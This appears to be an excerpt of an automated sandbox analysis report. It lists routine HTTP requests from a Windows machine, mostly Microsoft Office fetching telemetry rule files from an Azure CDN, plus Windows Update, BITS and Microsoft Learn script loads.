              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
              Source: global trafficHTTP traffic detected: GET /scripts/c/ms.jsll-4.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule90401v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Sp8chA7XUbEVBFr&MD=AEems1gD HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
